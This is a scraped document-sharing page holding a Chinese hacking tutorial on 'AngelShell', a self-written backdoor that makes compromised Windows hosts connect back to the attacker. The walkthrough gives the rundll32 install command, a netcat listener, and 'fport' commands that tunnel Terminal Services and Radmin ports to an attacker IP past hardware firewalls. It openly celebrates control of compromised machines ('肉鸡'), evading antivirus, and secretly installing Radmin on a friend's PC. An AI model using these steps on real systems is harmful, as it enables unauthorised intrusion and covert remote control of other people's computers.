让所有正向程序实现反向连接

上传人:ji****72 文档编号:35962663 上传时间:2018-03-23 格式:DOC 页数:5 大小:56KB
返回 下载 相关 举报
让所有正向程序实现反向连接_第1页
第1页 / 共5页
让所有正向程序实现反向连接_第2页
第2页 / 共5页
让所有正向程序实现反向连接_第3页
第3页 / 共5页
让所有正向程序实现反向连接_第4页
第4页 / 共5页
让所有正向程序实现反向连接_第5页
第5页 / 共5页
亲,该文档总共5页,全部预览完了,如果喜欢就下载吧!
资源描述

《让所有正向程序实现反向连接》由会员分享,可在线阅读,更多相关《让所有正向程序实现反向连接(5页珍藏版)》请在金锄头文库上搜索。

1、让所有正向程序实现反向连接(应用篇)让所有正向程序实现反向连接(应用篇)适合读者:入侵爱好者、黑客工具爱好者 前置知识:3389 终端使用方法、Radmin 使用方法 蝴蝶:硬件防火墙是入侵和控制肉鸡的噩梦,而能饶过防火墙的反向连接后门又有诸多不便, 常长莫名其妙地罢工这样的日子即将过去!我们这次用的后门,不仅要让它自己能够实现 反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、 Radmin、MSSQL 等!吃惊?不用的,只是你没想到、别人没写出来程序而已!AngelShellAngelShell:让所有正向程序实现反向连接(应用篇):让所有正向程序实现反向连接(应用

2、篇)现在的服务器几乎全是放在硬件防火墙后的,好不容易渗透进去,结果却发现装有硬件防火墙,扫兴 啊!什么终端服务、什么 Radmin 之类的控方式想都不要想。试了试,发现几乎都支持反向连接,正向连 接只能连接 80 和 21 端口,连 1433 都连不上。那就传个反向的后门上去吧,一传上去就被杀毒软件 Kill 了。一气之下,搬出 Delphi,自己动手写后门!花了几天的时间,后门终于写好了,也达到了理想中的 要求,使用效果非常不错,足以称为硬件防火墙和内网肉鸡的噩梦了!不敢独享,赶紧拿出来给大家共同 分享一下。这个程序叫 AngelShell,这里用我的肉鸡和自己使用的计算机做测试。首先需要在

3、本地配置一个记 载反向连接信息的文件,第一行是自己的 IP,第二行是用 NC 监听的端口。写好后把它放到 HTTP 空间上, 然后进行配置:配置好密码和你刚才上传到 FTP 空间里的 HTTP 访问地址,如图 1 所示。图 1你可以选择生成 DLL 的服务端或者 EXE 的服务端,其中 EXE 的服务端直接运行即可安装,而 DLL 的 服务端则需要用如下命令安装:“rundll32 dll 路径,I”,记得最后一个 I 一定要大写。小提示:程序作者其实是为了方便大家才提供的 EXE 服务端,其本质也是安装 DLL 程序,只不过是用程序 来解包并自动实现安装。这里我以 DLL 服务端来示范。先把

4、 DLL 传到心爱的肉鸡上面,然后在命令行上面打入:“rundll32 angel.dll,I”。注意这里我是通过 FTP 连接上肉鸡的,为了方便就直接用 FTP 的命令行安装了,如图 2 所示。图 2装好以后,在自己的机器上用:“nc v l p 7787”监听 7787 端口,也就是我最开始写的配置文件 里的端口。过了一会 NC 就提示有信息传输,输入密码敲回车,OK,连接成功。帮助信息显示后,可爱的 Shell 出来了。如图 3 所示。图 3 小提示:这个后门还提供了一些附加命令,可以直接在 Shell 中执行。作者为了避免与已有的程序名 冲突,所以附加命令全部为小写。讲到这里,大家也许

5、会觉得偶这款后门除了可以生成 EXE 服务端以外,也没什么特别的。当然,就这 些功能当然不够打造出我的特色,也不能算是硬件防火墙的噩梦。我们这次用的后门,不仅是要让它自己 能够实现反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、 Radmin、MSSQL 等等!呵呵,不要吃惊,好戏正在后头呢,偶不会让大家失望的,Lets GO!看到 Shell 里的 Fport 附加命令没有?也就是端口转发,它可以把远程计算机的任意端口反向模拟到 本地来。什么?你没懂?呵呵,没关系,往下看就知道了。我们先来测试一下 Windows 的终端服务。这台 肉鸡以前就被我开过终端服务了,但一

6、直苦于硬件防火墙的拦截而无法连接,今天要好好爽一下!小知识:Fport 的用法: fport 其中参数 local port 是指你在肉鸡上要转发的端口,Your IP 是你的 IP(或域名,YourPort 是指你的客 户端上监听的端口。打开客户端,在“要模拟的端口”上面填 3389,在“连接远程计算机的端口”上任意填,当然不要与已 开的端口冲突,这里我填 7788,然后点“开始监听”。赶紧到肉鸡的 Shell 下面敲入:“fport 3389 61.187.*.* 7788”。其中 3389 是肉鸡的终端服务的端口,7788 是我们这边这个连接远程计算机的 端口。然后客户端上马上提示已接收

7、到远程计算机的连接,提示此时已经可以连接本地的 3389 端口了。 这样我们就把肉鸡上的 3389 端口搬到自己的爱机上来了,如图 4 所示。图 4 朋友们,我们还等什么呢?打开终端服务登录器,IP 填上本地的 127.0.0.1,连接,客户端马上显示 已经成功建立了一个新的连接,并出现了远程桌面登录的对话框,我心里那个激动啊,真是语言无法表达!我们再试试登录两个用户,客户端又显示成功建立了一个新的连接。事实证明,同时登录 2 个用户也成功 了!当然,如果你愿意的话可以登录更多的用户,我编程的时候设置的每个连接都通过 2 个线程来进行数 据传输,所以在传输速度方面是有保障的。如图 5 所示。图

8、 5沉浸在喜悦中时,电话响了,原来是一位 MM 买了摄像头,叫我去帮她装,这也要去?于是叫她上 QQ,正好给偶再测试一次。这位 MM 虽然没有硬件级的防火墙,但是她在内网,用的是 Windows XP 专业版。 我先把 EXE 的服务端传给她,叫她运行,然后在本地进行监听,过一会就提示收到信息并需要输入密码。 输入密码后得到了一个 Shell,再用文件下载功能给她安装一个 Radmin,够阴险吧!然后敲入如下命令: “fport 4899 61.187.*.* 7788”,将她的 4899 端口转发到我的 4899 端口来,然后在本地打开 Radmin Viewer,连接 IP 写 127.0

9、.0.1,端口就用默认的 4899,成功连接!如图 6 所示。图 6帮她打开设备管理器,三下五除二装好了摄相头驱动程序,MM 还楞在那不知道怎么回事,哈哈,等 她反应过来后那个崇拜啊!非吵着要拜我为师,汗测试到这里也就结束了,心里的痛快就别提了,呵 呵!该程序理论上是支持任何协议的,但是由于某些协议的特殊性,它会对 IP 进行验证,所以可能会达不到我们想要的效果。比如 WEB 服务,今天本来把肉鸡上的 80 端口转过来了,想骗骗别人说自己开了个网站。结果一连上来却显示什么:“No webin this ”,大概意思就是这个地址没有 WEB 服务,这才想起 HTTP 协议中还有个 Host 的值不符合,难怪。最后说一下关于在内网中使用本程序的方法。如果自己在内网的话,需要一台允许正向连接的肉鸡来做中转,把要转的那台服务器的端口转到这个中转肉鸡上,然后直接连接这个中转肉鸡就相当于连接服务器了! 好了,希望这篇文章能给大家带来帮助,朋友们能看到这里,我也已经很感谢了。最后祝大家永远开心,技术蒸蒸日上!

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 行业资料 > 其它行业文档

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号